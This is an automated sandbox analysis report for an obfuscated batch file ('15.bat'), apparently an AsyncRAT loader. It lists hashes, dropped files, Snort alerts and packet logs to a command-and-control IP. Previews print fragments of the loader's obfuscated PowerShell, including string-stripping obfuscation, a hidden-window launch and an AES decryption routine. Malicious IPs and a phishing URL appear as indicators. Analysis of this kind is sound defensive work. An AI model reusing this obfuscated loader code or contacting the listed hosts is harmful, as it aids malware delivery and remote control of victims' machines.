https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66CD7000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmptrue
      • URL Reputation: malware
      		unknown
      http://crl.microsoftpowershell.exe, 00000006.00000002.1698215372.000001BB663C6000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://go.micropowershell.exe, 00000006.00000002.1698349267.000001BB67832000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1713621454.000001BB76AB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1713621454.000001BB7697E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB6850E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/Licensepowershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://oneget.orgXpowershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://aka.ms/pscore68powershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1698349267.000001BB668F1000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1698349267.000001BB66BD5000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://oneget.orgpowershell.exe, 00000006.00000002.1698349267.000001BB67F1F000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                193.222.96.128
                		unknownGermany
                		3303SWISSCOMSwisscomSwitzerlandLtdCHtrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1429038
                Start date and time:2024-04-20 10:05:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 53s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:15.bat
                Detection:MAL
                Classification:mal68.evad.winBAT@11/10@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 67%
                • Number of executed functions: 5
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .bat
                • Override analysis time to 240s for powershell

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 72.21.81.240
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:05:57API Interceptor15586908x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SWISSCOMSwisscomSwitzerlandLtdCHShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                • 193.222.96.147
                Encrypted_PaymentAdvice_Reference.htmlGet hashmaliciousHTMLPhisherBrowse
                • 193.222.96.119
                z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.21
                z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.21
                UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.21
                wFtZih4nN9.elfGet hashmaliciousMiraiBrowse
                • 85.7.65.219
                dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • 193.222.96.11
                http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                • 193.222.96.132
                enEQvjUlGl.elfGet hashmaliciousMiraiBrowse
                • 178.194.189.44
                Oo2yeTdq5J.elfGet hashmaliciousMiraiBrowse
                • 85.2.40.128

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):69993
                Entropy (8bit):7.99584879649948
                Encrypted:true
                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                MD5:29F65BA8E88C063813CC50A4EA544E93
                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):330
                Entropy (8bit):3.139206469813435
                Encrypted:false
                SSDEEP:6:kKBlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:JlMkPlE99SNxAhUeVLVt
                MD5:A3DACFA0F0F602EEB4894B54ED7228F1
                SHA1:856A6B3CC26B92BEDAA5D0598A467BC457D1C052
                SHA-256:3E97091CB04ED8491BBEB056667718E4FB73EB5E5B060A2BCE892F8F55758747
                SHA-512:95831E9410F9D6173A01B840C3416C5C407ED2E3E669405243DA97622E743E6B7CD1AFBCFC2E6EBE98A783280E1D963F52108D5CF2AE609743B3ABE452C40450
                Malicious:false
                Reputation:low
                Preview:p...... .........bf.`H..(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):9713
                Entropy (8bit):4.93568648418653
                Encrypted:false
                SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smwY1D:lVib49Vkjh4iUxlYvcYKib4o
                MD5:A7EDDF0DCC37957ABAFE63CE6D0BE4CA
                SHA1:5B09680EF1C3C405D698481E1364BE0C412C7A9C
                SHA-256:B9F314DC6C4DDB176CB92C77ECB5FCA91FB58FBE12DCFD9CEB4E8BFFC07B5327
                SHA-512:A906C8FFAB88AD0CEAD9A5B4D7D4089C1621A8D36F7190EF6FD829B0D942BBBC89E76424C46E204282B6985C02ABD3488082A6A2A4D88CDE396C480E2989AF73
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):2832
                Entropy (8bit):5.414030276061799
                Encrypted:false
                SSDEEP:48:0AzsSU4YymI4RIoUeCa+m9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHYvIIfLz9qrh7KrJ5Eo9Adrxz
                MD5:BAF5A10C59FD93E444E5B672D7CCB1D4
                SHA1:906BB875AB47D641756F44E09633F75AFDDDD638
                SHA-256:B029CB8CEA8D97BF6F636D2BE3F7A0F3334A07E22B832581A3D1D1F282AFC637
                SHA-512:B52A2F66B83271814381F897CD32B83ED97F18553EEDB8DDABE99B93EAF58C46A362E6255B0744C41C5E91042238E15ED9E4CF46C11446937B850F104965087A
                Malicious:false
                Reputation:low
                Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owwgvgmx.sep.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rm4u2mft.m10.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlkrsuot.rle.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xenaccby.0uo.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):8
                Entropy (8bit):2.75
                Encrypted:false
                SSDEEP:3:Rt:v
                MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                Malicious:false
                Preview:.5.False

                \Device\ConDrv

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (2132), with CRLF line terminators
                Category:dropped
                Size (bytes):2134
                Entropy (8bit):5.765159968838168
                Encrypted:false
                SSDEEP:48:kdSNM0GgCsFm5AIP+TKR23R98Rx+BLB0cfPBkqkwArX1xngW3JVFgntlYcW3IS:kI1T+AIG+E307+BLB0cf3S1GMonn6H
                MD5:44936E2D6C7772C5ABB7AD1399222214
                SHA1:3F8C2BE67E603E708C15E866C7F6F227A666DA4F
                SHA-256:65A32A02EE58510D7F5D7DFE3D0D7F0E5D41F31C80456A6E457ACEA9C861A7BA
                SHA-512:38CEB16C2B383395DFFD4C0EBE5DFF0BA5EE5F7252C543D7733A2CA615D4058028DC976B883DF91342B18AA117A72BFC5A96A73FBDAF51E3BC19DC37BC9B9E38
                Malicious:false
                Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptogra

                Static File Info

                General

                File type:DOS batch file, ASCII text, with very long lines (51246), with CRLF line terminators
                Entropy (8bit):6.003197930819005
                TrID:
                  File name:15.bat
                  File size:62'382 bytes
                  MD5:1bf971e48ba0ca904319be9147a96c33
                  SHA1:75078fd8b6a000b848eb3f372e5f84fb58d5b98e
                  SHA256:74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e
                  SHA512:e24d8d46a962c1d659a742a1926c6628f9e88268449b36a93bba5def5390eca141903e329afd3eda70f79cc391f8391e9f15639918addc923819a3efe3dcc6d0
                  SSDEEP:1536:pdgEdB7d8SZXy3SMlwVdgC1mKRkm6DUL9:paEdNGSsSR3sKRkrDo
                  TLSH:5E53E1082BAB879758AAD418DFC570C709C799875DB8FAF45F5B202A21B7A3340F5723
                  File Content Preview:@echo off..set "gwAVRA=seWiBDht aWiBDhPiBWiBDh=1WiBDh &WiBDh&WiBDh sWiBDhtaWiBDhrt WiBDh"WiBDh" WiBDh/mWiBDhinWiBDh WiBDh"..set "CMXyhD=&WiBDh& eWiBDhxiWiBDhtWiBDh"..set "pEXfDe=noWiBDht WiBDhdeWiBDhfWiBDhiWiBDhneWiBDhd aWiBDhPWiBDhiBWiBDh..if %pEXfDe:WiB

                  File Icon

                  Icon Hash:9686878b929a9886

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  04/20/24-10:06:05.477978TCP2850454ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT)444949730193.222.96.128192.168.2.4

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Apr 20, 2024 10:06:05.059465885 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:05.261924982 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:05.262198925 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:05.274139881 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:05.477977991 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:05.483889103 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:05.690464973 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:05.744736910 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:06.648036957 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:06.902771950 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:06.902887106 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:07.155409098 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:18.809006929 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:19.056802988 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:19.057018042 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:19.262202978 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:19.307322979 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:19.509840012 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:19.519445896 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:19.775299072 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:19.775485039 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:20.025736094 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:30.979486942 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:31.228714943 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:31.228943110 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:31.432890892 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:31.479065895 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:31.681679964 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:31.683608055 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:31.931751966 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:31.931982040 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:32.181802988 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:43.151253939 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:43.400309086 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:43.400445938 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:43.604294062 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:43.650942087 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:43.853630066 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:43.855947018 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:44.103606939 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:44.103995085 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:44.353465080 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:55.323198080 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:55.572362900 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:55.572725058 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:55.776315928 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:55.822690964 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:56.025016069 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:56.027904987 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:56.275512934 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:06:56.275585890 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:06:56.525357008 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:07.495194912 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:07.755770922 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:07.756006002 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:07.961678982 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:08.010253906 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:08.212491035 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:08.214807034 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:08.463056087 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:08.463587999 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:08.712913036 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:19.666765928 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:19.934175014 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:19.934254885 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:20.141429901 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:20.198467970 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:20.401392937 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:20.406703949 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:20.650386095 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:20.651022911 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:20.900355101 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:22.026459932 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:22.275502920 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:22.275700092 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:22.480595112 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:22.528429031 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:22.730786085 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:22.732867002 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:22.984918118 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:22.985029936 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:23.228439093 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:29.729351997 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:29.973160982 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:29.973376989 CEST497304449192.168.2.4193.222.96.128
                  Apr 20, 2024 10:07:30.190988064 CEST444949730193.222.96.128192.168.2.4
                  Apr 20, 2024 10:07:30.247123957 CEST497304449192.168.2.4193.222.96.128
